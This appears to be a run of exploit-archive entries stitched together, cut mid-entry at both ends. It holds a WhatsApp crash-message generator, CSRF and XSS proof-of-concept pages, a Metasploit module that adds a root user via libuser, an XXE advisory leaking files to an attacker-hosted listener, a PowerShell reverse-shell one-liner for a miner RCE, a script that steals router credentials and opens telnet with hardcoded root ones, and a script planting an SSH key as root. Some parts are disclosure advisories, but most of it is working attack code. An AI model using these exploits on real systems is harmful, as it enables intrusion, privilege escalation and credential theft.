⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ'
sutf8 = payload.encode('UTF-8')
finalPoC = payload*6
print "[*] Writing to file: " + filename
open(filename, 'w').write("\n".join(payload))
print "[*] Done."
def howtouse():
print "Usage: whatsapp.py [FILENAME]"
print "[*] Mandatory arguments:"
print "[-] FILENAME"
sys.exit(-1)
if __name__ == "__main__":
try:
print "[*] WhatsApp 2.18.31 iOS - Remote memory corruption"
print "[*] Author: jsacco@exploitpack.com - http://exploitpack.com"
print "[*] How to use: Copy the content of the file and send
it as a message to another whatsapp user or group"
whatsapp(sys.argv[1])
except IndexError:
howtouse()
<!--
Details
================
Software: Metronet Tag Manager
Version: 1.2.7
Homepage: https://wordpress.org/plugins/metronet-tag-manager/
Advisory report: https://advisories.dxw.com/advisories/csrf-metronet-tag-manager/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF in Metronet Tag Manager allows anybody to do almost anything an admin can
Vulnerability
================
The pluginas settings page sends a nonce, and checks it when displaying the success/failure message, but is not checked when setting options.
This option is meant to contain JavaScript for Google Tag Manager, so itas displayed on every frontend page without escaping.
As this vulnerability allows adding arbitrary JavaScript, the attacker can use it to control an admin useras browser to do almost anything an admin user can do.
Proof of concept
================
-->
Press submit on a page containing the following HTML snippet:
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=metronet-tag-manager\">
<input type=\"text\" name=\"submit\" value=\"1\">
<input type=\"text\" name=\"gtm-code-head\" value=\"<script>alert(1)</script>\">
<input type=\"submit\">
</form>
<!--
In a real attack, the form can be made to autosubmit so the victim only has to follow a link.
Mitigations
================
Upgrade to version 1.2.9 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2018-04-13: Discovered
2018-04-16: Reported to plugin author via Facebook private message
2018-04-17: Plugin author confirmed receipt of message
2018-04-24: Plugin changelog indicates bug has been fixed in 1.2.9
2018-05-15: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Libuser roothelper Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Red Hat based Linux
systems, including RHEL, Fedora and CentOS, by exploiting a newline
injection vulnerability in libuser and userhelper versions prior to
0.56.13-8 and version 0.60 before 0.60-7.
This module makes use of the roothelper.c exploit from Qualys to
insert a new user with UID=0 in /etc/passwd.
Note, the password for the current user is required by userhelper.
Note, on some systems, such as Fedora 11, the user entry for the
current user in /etc/passwd will become corrupted and exploitation
will fail.
This module has been tested successfully on libuser packaged versions
0.56.13-4.el6 on CentOS 6.0 (x86_64);
0.56.13-5.el6 on CentOS 6.5 (x86_64);
0.60-5.el7 on CentOS 7.1-1503 (x86_64);
0.56.16-1.fc13 on Fedora 13 (i686);
0.59-1.fc19 on Fedora Desktop 19 (x86_64);
0.60-3.fc20 on Fedora Desktop 20 (x86_64);
0.60-6.fc21 on Fedora Desktop 21 (x86_64);
0.60-6.fc22 on Fedora Desktop 22 (x86_64);
0.56.13-5.el6 on Red Hat 6.6 (x86_64); and
0.60-5.el7 on Red Hat 7.0 (x86_64).
RHEL 5 is vulnerable, however the installed version of glibc (2.5)
is missing various functions required by roothelper.c.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Jul 24 2015',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'roothelper.c' ],
[ 'EDB', '37706' ],
[ 'CVE', '2015-3245' ],
[ 'CVE', '2015-3246' ],
[ 'BID', '76021' ],
[ 'BID', '76022' ],
[ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ],
[ 'URL', 'https://access.redhat.com/articles/1537873' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def password
datastore['PASSWORD'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def live_compile?
compile = false
if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
compile = true
else
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
end
compile
end
def check
userhelper_path = '/usr/sbin/userhelper'
unless setuid? userhelper_path
vprint_error "#{userhelper_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{userhelper_path} is setuid"
unless command_exists? 'script'
vprint_error "script is not installed. Exploitation will fail."
return CheckCode::Safe
end
vprint_good 'script is installed'
if cmd_exec('lsattr /etc/passwd').include? 'i'
vprint_error 'File /etc/passwd is immutable'
return CheckCode::Safe
end
vprint_good 'File /etc/passwd is not immutable'
glibc_banner = cmd_exec 'ldd --version'
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
if glibc_version.to_s.eql? ''
vprint_error 'Could not determine the GNU C library version'
return CheckCode::Detected
end
# roothelper.c requires functions only available since glibc 2.6+
if glibc_version < Gem::Version.new('2.6')
vprint_error "GNU C Library version #{glibc_version} is not supported"
return CheckCode::Safe
end
vprint_good "GNU C Library version #{glibc_version} is supported"
CheckCode::Detected
end
def exploit
if check == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
# Upload Qualys' roothelper.c exploit:
# - https://www.exploit-db.com/exploits/37706/
path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'
fd = ::File.open path, 'rb'
c_code = fd.read fd.stat.size
fd.close
upload "#{executable_path}.c", c_code
output = cmd_exec "gcc -o #{executable_path} #{executable_path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{executable_path}.c failed to compile"
end
cmd_exec "chmod +x #{executable_path}"
register_file_for_cleanup executable_path
else
vprint_status 'Dropping pre-compiled exploit on system...'
# Cross-compiled with:
# - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c
path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'
fd = ::File.open path, 'rb'
executable_data = fd.read fd.stat.size
fd.close
upload_and_chmodx executable_path, executable_data
end
# Run roothelper
timeout = 180
print_status "Launching roothelper exploit (Timeout: #{timeout})..."
output = cmd_exec "echo #{password.gsub(/'/, "\\\\'")} | #{executable_path}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"}
register_file_for_cleanup $1
end
if output =~ /died in parent: .*.c:517: forkstop_userhelper/
fail_with Failure::NoAccess, 'Incorrect password'
end
@username = nil
if output =~ /Exploit successful, run "su ([a-z])" to become root/
@username = $1
end
if @username.blank?
fail_with Failure::Unknown, 'Something went wrong'
end
print_good "Success! User '#{@username}' added to /etc/passwd"
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Execute payload executable
vprint_status 'Executing payload...'
cmd_exec "script -c \"su - #{@username} -c #{payload_path}\" | sh & echo "
register_file_for_cleanup 'typescript'
end
#
# Remove new user from /etc/passwd
#
def on_new_session(session)
new_user_removed = false
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
# Remove new user
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\""
# Wait for clean up
Rex.sleep 5
# Check for new user in /etc/passwd
passwd_contents = session.fs.file.open('/etc/passwd').read.to_s
unless passwd_contents =~ /^#{@username}:/
new_user_removed = true
end
elsif session.type.to_s.eql? 'shell'
# Remove new user
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' /etc/passwd"
# Check for new user in /etc/passwd
passwd_user = session.shell_command_token "grep '#{@username}:' /etc/passwd"
unless passwd_user =~ /^#{@username}:/
new_user_removed = true
end
end
unless new_user_removed
print_warning "Could not remove user '#{@username}' from /etc/passwd"
end
rescue => e
print_error "Error during cleanup: #{e.message}"
ensure
super
end
end
<!--
################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: totemomail Encryption Gateway
# Vendor: totemo AG
# CSNC ID: CSNC-2018-003
# CVE ID: CVE-2018-6563
# Subject: Cross-Site Request Forgery
# Risk: High
# Effect: Remotely exploitable
# Author: Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 14.05.2018
#
################################################################################
Introduction:
-------------
The totemomail Encryption Gateway protects email communication with any external
partner by encryption. It doesn't matter whether you exchange emails with
technically savvy communication partners or with those who have neither an
appropriate infrastructure nor the necessary know-how. The encryption gateway
also makes it easy to securely send very large attachments.[1]
Compass Security discovered a vulnerability in the webmail part of the
solution. It is possible to predict all parameters that are required to
execute actions on the webmail interface. This allows an attacker to perform
Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a malicious web
page that will automatically send a request to the Encryption Gateway. If the
user is logged in, the request will be executed by the Encryption Gateway on
behalf of the logged in user. This could be used to change a user's settings, send emails or
change contact informations.
Affected:
---------
Vulnerable:
* 6.0.0_Build_371
No other version was tested but is is likely that older versions are affected as
well.
Technical Description
---------------------
In the webmail, no anti-CSRF token is used. Although the viewState makes the
attack more complex, it is possible to entirely predict the requests and thus,
perform CSRF attacks. The requirement here is to perform the attack as a replay of a full
user interaction. One has to replay every request to make sure that the viewState is
updated on the server side and corresponds to the action that is performed by
the malicious page.
Such a malicious page is presented below, it will automatically send 3 requests
that will change the user's detail:
==========
-->
<html>
<body>
<script>
function submitRequest1()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function submitRequest2()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function submitRequest3()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest1();
submitRequest2();
submitRequest3();
</script>
</body>
</html>
<!--
==========
Workaround / Fix:
-----------------
Install an up to date version of totemomail Encryption Gateway.
As a developer, the requests that execute actions must include an unpredictable
element. This is usually done by using an anti-CSRF token. This token is a
random value tied to the user's session and must be verified by the server
before executing any action on behalf of the user.
Timeline:
---------
2018-05-14: Coordinated public disclosure date
2018-03-XX: Release of fixed version 6.0_b511
2018-02-13: Initial vendor response
2018-02-09: Initial vendor notification
2018-02-02: Assigned CVE-2018-6563
2018-01-11: Discovery by Nicolas Heiniger
References:
-----------
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption
-->
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
=======================================================================
title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
fixed version: 8.3 P1 and later
CVE number: CVE-2018-1247
impact: High
homepage: https://www.rsa.com
found: 2017-11-16
by: Mantas Juskauskas (Office Vilnius)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.
SEC Consult recommends to apply the available patches from the vendor.
Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)
2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.
The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.
3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.
The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.
Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.
Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.
For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==========================================================================================
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: <host>:7004
Cookie: [snip]
[snip]
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
<key>
&e1;
</key>
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"
[snip]
==========================================================================================
In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==========================================================================================
# cat /var/www/a.dtd
<!ENTITY % p1 SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">
%p2;
==========================================================================================
Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked to a remote listener controlled by the attacker:
==========================================================================================
# nc -nlvp 8080
listening on [any] 8080 ...
connect to [<attacker>] from (UNKNOWN) [<host>] 32817
GET /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1
==========================================================================================
Similarly, contents of other internal files can be obtained from the affected
system with current service user permissions.
2) Cross-site Flashing
The issue affects a third party component pmfso (DSA-2018-082).
To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
it is sufficient to click the following URL:
https://<host>:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")//
3) DOM based Cross-site Scripting
Example 1:
The issue affects a third party component PopCalendarX (CVE-2017-9072).
To exploit DOM based reflected cross-site scripting it is enough to trick a
victim into executing the following JavaScript (e.g. by clicking on a
specially crafted link):
==========================================================================================
<script>
window.name = "gToday:#' onload='alert(document.domain)' ";
location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";
</script>
==========================================================================================
Example 2:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.
Example 3:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.
Vulnerable / tested versions:
-----------------------------
The identified vulnerabilities have been verified to exist in the
RSA Authentication Manager, version 8.2.1.4.0-build1394922 which was the latest
version available during the test.
Vendor contact timeline:
------------------------
2017-11-23: Contacting vendor through security_alert@emc.com
2017-11-24: Vendor confirms the information was received, forwards it
to the responsible team for investigation and assigns tickets.
2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
plan is being determined.
2018-01-04: Contacting vendor for a status update.
2018-01-04: Vendor provides a possible fix date.
2018-02-21: Vendor provides a status update regarding the fix release date.
2018-04-24: Vendor contacts for credit text approval.
2018-05-08: Contacting vendor for the reason of uncoordinated public
release and status information
2018-05-08: Vendor provides an update regarding their public release and
status of vulnerabilities not included in the release, vendor info:
* DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
was released on 5/4
* DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
was released on 5/3
2018-05-16: Security advisory release
Solution:
---------
The vendor has released an advisory that contains recommendations of how to
resolve the reported XML External Entity Injection Vulnerability:
DSA-2018-086 - https://community.rsa.com/docs/DOC-92085 - (RSA Link Sign On Required)
Full Disclosure archive:
http://seclists.org/fulldisclosure/2018/May/18
Note: the suggested resolution also provides a fix for the Cross-site Flashing
and DOM based Cross-site Scripting (only Example 1) issues provided in the
descriptions above.
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF M. Juskauskas / @2018
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Convert it into hexadecimal and paste it on the second parameter inside this string:
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
You got the shell!
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.
# coding: utf-8
# Exploit Title: Intelbras NCloud Authentication bypass
# Date: 16/05/2018
# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com
# Vendor Homepage: http://www.intelbras.com.br/
# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2018-11094
# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly
# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh').
# The configurations backup file contains the web interface username and password.
# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist,
# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials
# to log into the device using telnet.
import sys
import requests
import telnetlib
import re
def help():
print 'Usage: '
print 'python exploit.py http://192.168.0.1'
def pop_shell(host, user, password):
if(user == "root"):
print '[+] Trying default credentials: root:cary'
else:
print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh'
with open('NCLOUD_config.dat', "r") as f:
content = f.read()
user = content.split("Login=")[1].split("\n")[0]
password = content.split("Password=")[1].split("\n")[0]
#print 'User: '+ user
#print 'Password: '+ password
f.close()
try:
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0]
tn = telnetlib.Telnet(ip, 23, timeout=10)
tn.expect(["WORKGROUP login:"], 5)
tn.write(user + "\r\n")
tn.expect(["Password:"], 5)
tn.write(password + "\r\n")
i = tn.expect(["Login incorrect"], 5)
if i[0] != -1:
raise ValueError('[-] Wrong credential')
tn.write("cat /proc/cpuinfo\r\n")
tn.interact()
tn.close()
except Exception as e:
print e
if(user == "root"):
pop_shell(host, 'try', 'again')
def exploit(host):
print '[*] Connecting to %s' %host
path = '/cgi-bin/ExportSettings.sh'
payload = 'Export=Salvar'
response = requests.post(host + path, data=payload)
response.raise_for_status()
if(response.status_code == 200 and "Login=" in response.text):
print '[+] Config download was successful'
print '[+] Saving backup file to NCLOUD_config.dat'
with open('NCLOUD_config.dat', "w") as f:
f.write(response.text)
f.close()
pop_shell(host, "root", "cary")
def main():
if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'):
help()
return
host = sys.argv[1]
exploit(host)
if __name__ == '__main__':
main()
# Exploit Title: Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery
# Date: 2018-05-16
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535
# Version: 4.0
# Tested on: windows
================================================
# POC 1 : SQLi
# test : test.com/en/providers?search='
# Description: Put ' in the search parameter and you will have SQL syntax error.
You can use "extractvalue()" or "updatexml()" functions to get data from database.
================================================
# POC 2 : CSRF
# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script.
With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely.
================================================
# Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://test.com/admin/accountSetting" method="POST">
<input type="hidden" name="data[username]" value="testcsrf />
<input type="hidden" name="data[email]" value="lord.nematzadeh123@gmail.com" />
<input type="hidden" name="data[firstname]" value="test2" />
<input type="hidden" name="data[lastname]" value="test3" />
<input type="hidden" name="data[mobile]" value="1000000000" />
<input type="hidden" name="data[website]" value="" />
<input type="hidden" name="data[password]" value="1234567890-" />
<input type="hidden" name="data[language_id]" value="1" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
'''
Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.
This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.
'''
#!/usr/bin/python3
import json
import sys
import socket
import os
import time
from websocket import create_connection
def ubusAuth(host, username, password):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":["00000000000000000000000000000000","session","login",
{"username": username,"password":password}],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
key = response.get('result')[1].get('ubus_rpc_session')
except IndexError:
return(None)
return(key)
def ubusCall(host, key, namespace, argument, params={}):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
"params":[key,namespace,argument,params],
"id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close()
try:
result = response.get('result')[1]
except IndexError:
if response.get('result')[0] == 0:
return(True)
return(None)
return(result)
def sendData(host, port, data=""):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(data.encode('utf-8'))
s.shutdown(socket.SHUT_WR)
s.close()
return(None)
def recvData(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(1024)
s.shutdown(socket.SHUT_WR)
s.close()
return(data)
if __name__ == "__main__":
host = "192.168.1.1"
username = "user"
password = "user"
key = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427"
payload = ("""
/bin/echo "%s" > /etc/dropbear/authorized_keys;
""" % key)
print("Authenticating...")
key = ubusAuth(host, username, password)
if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)
print("Enabling p910nd and setting up exploit...")
pwn910nd = ubusCall(host, key, "uci", "set",
